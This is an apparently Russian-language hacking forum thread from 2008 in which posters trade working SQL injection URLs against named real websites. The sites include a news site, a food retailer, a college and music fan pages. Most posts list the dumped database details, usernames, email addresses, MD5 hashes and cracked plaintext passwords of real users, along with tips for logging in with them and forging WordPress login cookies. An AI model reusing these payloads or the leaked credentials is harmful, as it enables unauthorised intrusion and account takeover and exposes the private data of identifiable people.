08.01.2008, 23:34
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
http://www.networkofdisclosure.com/
Код HTML:
http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4/*
5.0.45-community:networko_user@localhost:networko_db
Код HTML:
http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,user_id,username,user_password),4+FROM+users+LIMIT+10,1/*
4:Jay Fishman:bf4cf16ad122a0cdc77b3c84b637219f::f1shman
5:Brad Hamann:00cdb7bb942cf6b290ceb97d6aca64a3:: password7
7:Brent Moeshlin:7c3d0453108aefa46c07e91c8bc031d3:: officer1
9:Court Eilertson:6db6339dbf5ebc3ce4b1af93a8dfec58::count1
Код HTML:
http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,member_id,email,password),4+FROM+member+LIMIT+7,1/*
27:jaybfishman@aol.com:bf4cf16ad122a0cdc77b3c84b63 7219f::f1shman
7:bmoeshlin@qualitycomix.com:7c3d0453108aefa46c07e 91c8bc031d3:: officer1
9:ceilert@msn.com:6db6339dbf5ebc3ce4b1af93a8dfec58 ::count1
2:Nearmint@aol.com:f1c943880885e79825464b0f86f80f6 e::424344
С мейл:пас сюда: http://www.networkofdisclosure.com/login.php,
а там можно еще зайти под тем же логином на форум. Кнопка Member's Forum.
|
|
|
16.01.2008, 16:09
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами:
10065986
Репутация:
785
|
|
proexmotorsport.liveforspeed.hu
Код HTML:
http://proexmotorsport.liveforspeed.hu/index.php?headlinesid=999999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
proex_web@localhost:4.0.22-nt:proex_web
Код HTML:
http://proexmotorsport.liveforspeed.hu/index.php?headlinesid=999999+union+select+0,1,2,concat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+members/*
pass: 96w9sFSaaPqGQ
foodcentrale.com
Код HTML:
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1/*
admin@www.foodcentrale.de:5.0.27:foodcentrale
Код HTML:
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+table_name,1+from+information_schema.tables+limit+10,100/*
- названия таблиц
Код HTML:
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+column_name,1+from+information_schema.columns/*
- названия столбцов
Код HTML:
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+concat(user),1+from+fc_basket_user/*
|
|
|
|
19.01.2008, 19:59
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
Сообщение от 159932
4.0.27-log
-----------------------------------------------------
4.0.27-log
-----------------------------------------------------
4.0.17-nt
-----------------------------------------------------
5.0.24-community-nt
http://www.isobelcampbell.com/phpbb2/
13к узеров
admin:hamilton
-----------------------------------------------------
я конечно понимаю что офиц сайт битлз - это кощунство - но всётаки ..
но вывода добиться не удалось (( можт комуто повезёт больше ))
http://www.beatles.com/hub/article.php?page=-yeloSub'+union+select+1,2,version(),4/*&menuItem=the%20films
5 мускул,а дальше сам копай 
|
|
|
|
21.01.2008, 02:27
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами:
10639074
Репутация:
16
|
|
Любителям футбола посвящяется
_http://fctavriya.org.ua/cgi-bin/news-details.cgi?newsid=-469+union+select+1,2,log in,4,pas,6,7+from+users+where+id=1/*
|
|
|
|
26.01.2008, 20:31
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
С нами:
10002038
Репутация:
100
|
|
|
|
|
|
31.01.2008, 17:28
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами:
10636106
Репутация:
705
|
|
свежая уязвимость и ...
admin|91b41df29d41d9222c99702c718c27c1
admin|5cf5e1e79cc08b7b27e2dfeb6ee136a7
djsonic|85493514b935d53994045bdb044a4ab5
двойной md5 хэш пароль
wordpressuser_xxx=логин;wordpresspass_xxx=д ойной_md5_хэш_пароля
где xxx - md5 хэш урла блога без обратного слэша, например: md5("xttp//site.com/wordpress") |
|
|
|
31.01.2008, 17:30
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами:
10065986
Репутация:
785
|
|
например
-17'+order+by+1/* и
-17'+order+by+100000/*
никаких отличий не дали (((
как опеределили или это просто подбор унионом???
Нужно чтобы -17' - было существующий значение. 17+order+by+1/*
Подробнее https://forum.antichat.ru/showpost.php?p=373193&postcount=17
Вообщето есть специальная тема для таких вопросов - http://forum.antichat.ru/threadedpost579824.html#post579824
Последний раз редактировалось .Begemot.; 31.01.2008 в 17:37..
|
|
|
|
21.02.2008, 19:36
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
С нами:
10039659
Репутация:
209
|
|
www.antioch-college.edu
Код:
http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
user() - acollege_colleg1@localhost
database() - acollege_college1
version() - 5.0.27-standard
Код:
http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,id,4,password,6,7,8,9,10,11,12+from+users/*
id - 13
md5($password) - 97d735d01e2c3e9ba77719db119b8404
password - amaruyama
|
|
|
|
21.02.2008, 19:40
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Код:
http://www.vergelijking.be/gsm/data.php?id=0x3127%20union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.32-Debian_7etch1-log/vergelijking/vergelijking@localhost
Код:
http://www.hubbardbrook.org/gis/data.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8/*
4.1.21-community-nt/hbr/hbr_admin@savanna.lternet.edu' in
Код:
http://www.dogrel.com/English/News/article.php?id=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
4.1.21/DB_dogrel/dogrel@localhost
Код:
http://www.jdhindia.com/data.php?id=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user())/*
4.1.22-standard-log/loejclsy_jdh/loejclsy_jdh@localhost
Код:
http://www.somborvaros.org/data.php?lang=sr&id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*
4.0.18/somborvaros/somborinfo@80.74.160.40 |
|
|
|
07.03.2008, 14:06
|
|
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
С нами:
9909614
Репутация:
305
|
|
Для "поклонников" Metallica...
www.metpage.de
http://www.metpage.de/news/index.php?id=999')+union+select+1,2,3,4,5,6,7,8,us er(),version(),database(),12,13,14,15,16,17,18,19, 20,21/*
metnews@localhost:5.0.20-max-log:metnews
Доступна таблица wn_user:
Tommy:3fac1eead50fcb46ec56e0df6452251e: suku3s43
FrayedEnd:455018c4669f687ff757ffd4be3045cb: sebsucks
TheUnforgivenII:e93ac9964ed9c0444cfbfa9f8a26429a: metfan6
Elloy:c76f54e8d0db01297ac7a2e47be4cf13
P.S. Пассы расшифровал с помошью md5.xek.cc, пользуемся...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
